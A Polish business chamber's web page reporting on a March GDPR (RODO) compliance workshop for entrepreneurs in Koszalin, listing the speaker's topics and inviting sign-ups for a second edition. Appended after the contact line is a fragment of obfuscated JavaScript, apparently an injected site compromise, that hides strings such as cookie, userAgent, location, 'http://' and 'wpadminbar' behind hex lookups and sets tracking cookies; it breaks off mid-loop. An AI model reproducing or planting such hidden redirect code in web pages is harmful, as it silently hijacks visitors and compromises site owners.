Zmiany w RODO- relacja ze spotkania dla przediębiorców | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-warsztaty-dla-przedsiebiorcow-rodo-2018

W dniu 6 marca br o godzinie 10.00 w City Box Koszalin, odbyło się praktyczne spotkanie informacyjne ze zmian dotyczących Rozporządzenia o ochronie danych osobowych. Serdecznie dziękujemy wszystkim uczestnikom spotkania za przybycie oraz aktywne uczestnictwo. Nasz prelegent ze Szczecina, adwokat Michał Skwira przedstawił m.in. zagadnienia tj.:

  • Planowanie procesu wdrożenia RODO/GDPR.
  • Rola audytu w procesie wdrożenia RODO/GDPR.
  • Rodzaje audytów na gruncie RODO/GDPR.
  • Zasady audytowania.
  • Przeprowadzanie audytu.
  • Zapoznanie z podstawowymi pojęciami i kryteriami procesu szacowania ryzyka.
  • Zabezpieczenia minimalizujące ryzyko według RODO/GDPR

Polnocna-Izba-Koszalin-relacja-zmiany-RODO

Uczestnicy uzyskali również praktyczne wskazówki, jak przygotować plan postępowania związanego z ryzykiem wycieku danych, w tym jak obniżyć, zredukować oraz uniknąć ryzyka w czasie swojej działalności względem nowych przepisów, które wejdą w życie z dniem 25 maja br.

Pan Michał Skwira przygotował również wzory i omówienie klauzul, które zostaną na dniach przesłane dla wszystkich uczestników wraz z prezentacją.

Na zakończenie spotkania był przygotowany lunch przez City Box Koszalin.

Na prośbę obecnych przedstawicieli firm, poniżej dane do prelegenta (www.skwira.eu).

Serdecznie dziękujemy za tak liczne przybycie!

Polnocna-Izba-Koszalin-relacja-zmiany-RODO

Dla osób zainteresowanych drugą edycją, zapraszamy do zgłoszeń koszalin@izba.info lub telefonicznie do naszego biura. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m